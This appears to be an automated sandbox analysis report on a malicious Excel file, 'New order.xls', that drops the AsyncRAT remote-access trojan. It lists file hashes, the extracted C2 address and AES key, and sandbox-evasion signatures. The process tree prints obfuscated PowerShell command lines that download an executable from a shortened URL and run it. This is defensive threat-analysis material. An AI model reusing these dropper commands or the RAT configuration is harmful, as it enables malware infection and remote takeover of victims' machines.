Analysis
- max time kernel: 135s
- max time network: 143s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 13-12-2020 17:19
- Static task: static1
- Behavioral task: behavioral1
- Sample: New order.xls
- Resource: win7v20201028
General
- Target: New order.xls
- Size: 80KB
- MD5: bfa6b801f26f67cc2231d4191a2486e5
- SHA1: d6c3fe24036c6b402eeb80e065a11280aa236625
- SHA256: 076c11df218d9fd86a809bb3e3b4a9c2211caad31e630d731d64592bee49eec4
- SHA512: b06a89f9606533c9c7c6c0884c76c7e59919e1b66425e7e7f97d11bb2faafea80ed379c056c440269f3c6b132c297ea90172f54f893600747609d67a1202367b
Malware Config
Extracted
- URL: https://tinyurl.com/y6fpv3lj
Extracted
- Family: asyncrat
- Version: 0.5.7B
- C2: 66.63.162.20:6606
- Mutex: AsyncMutex_6SI8OkPnk
- aes_key: RrDsbyhuW4EmI2uyYOZXhcgJIPtjUanF
- anti_detection: false
- autorun: false
- bdos: false
- delay: Default
- host: 66.63.162.20
- hwid: 3
- install_file:
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 6606
- version: 0.5.7B
Signatures
- Process spawned unexpected child process (3 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description; pid; pid_target; process; target process):
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; 4248; 4700; powershell.exe; EXCEL.EXE
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; 2320; 4700; powershell.exe; EXCEL.EXE
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; 1864; 4700; powershell.exe; EXCEL.EXE
- Async RAT payload (2 IoCs)
  Resources (resource; yara_rule):
  - behavioral2/memory/4636-38-0x0000000000400000-0x0000000000412000-memory.dmp; asyncrat
  - behavioral2/memory/4636-39-0x000000000040C71E-mapping.dmp; asyncrat
- Looks for VirtualBox Guest Additions in registry (2 TTPs)
- Blocklisted process makes network request (2 IoCs)
  Processes (flow; pid; process):
  - 19; 4248; powershell.exe
  - 21; 4248; powershell.exe
- Executes dropped EXE (1 IoC)
  Processes (pid; process):
  - 2684; ay.exe
- Looks for VMWare Tools registry key (2 TTPs)
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes (description; ioc; process):
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion; ay.exe
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion; ay.exe
- Deletes itself (1 IoC)
  Processes (pid; process):
  - 4700; EXCEL.EXE
- Maps connected drives based on registry (3 TTPs, 2 IoCs)
  Disk information is often read in order to detect sandboxing environments.
  Processes (description; ioc; process):
  - Key opened; \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum; ay.exe
  - Key value queried; \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0; ay.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description; pid; process; target process):
  - PID 2684 set thread context of 4636; 2684; ay.exe; RegSvcs.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description; ioc; process):
  - Key opened; \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description; ioc; process):
  - Key opened; \REGISTRY\MACHINE\Hardware\Description\System\BIOS; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid; process):
  - 4700; EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes (pid; process):
  - 2320; powershell.exe (3 entries)
  - 4248; powershell.exe (3 entries)
  - 1864; powershell.exe (3 entries)
  - 2684; ay.exe (3 entries)
- Suspicious behavior: RenamesItself (1 IoC)
  Processes (pid; process):
  - 4700; EXCEL.EXE
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes (description; pid; process):
  - Token: SeDebugPrivilege; 2320; powershell.exe
  - Token: SeDebugPrivilege; 4248; powershell.exe
  - Token: SeDebugPrivilege; 1864; powershell.exe
  - Token: SeDebugPrivilege; 2684; ay.exe
  - Token: SeDebugPrivilege; 4636; RegSvcs.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes (pid; process):
  - 4700; EXCEL.EXE (2 entries)
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes (pid; process):
  - 4700; EXCEL.EXE (14 entries)
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description; pid; process; target process):
  - PID 4700 wrote to memory of 4248; 4700; EXCEL.EXE; powershell.exe (2 entries)
  - PID 4700 wrote to memory of 1864; 4700; EXCEL.EXE; powershell.exe (2 entries)
  - PID 4700 wrote to memory of 2320; 4700; EXCEL.EXE; powershell.exe (2 entries)
  - PID 2320 wrote to memory of 2684; 2320; powershell.exe; ay.exe (3 entries)
  - PID 2684 wrote to memory of 4628; 2684; ay.exe; RegSvcs.exe (3 entries)
  - PID 2684 wrote to memory of 4636; 2684; ay.exe; RegSvcs.exe (8 entries)
Processes (process tree; nesting shows parent/child depth)
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New order.xls"
  - Deletes itself
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: RenamesItself
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y6fpv3lj','ay.exe')
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:temp};.('.'+'/ay.exe')
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\ay.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\ay.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Maps connected drives based on registry
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -w 1 stARt`-slE`Ep 20; Move-Item "ay.exe" -Destination "${enV`:temp}"
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Downloads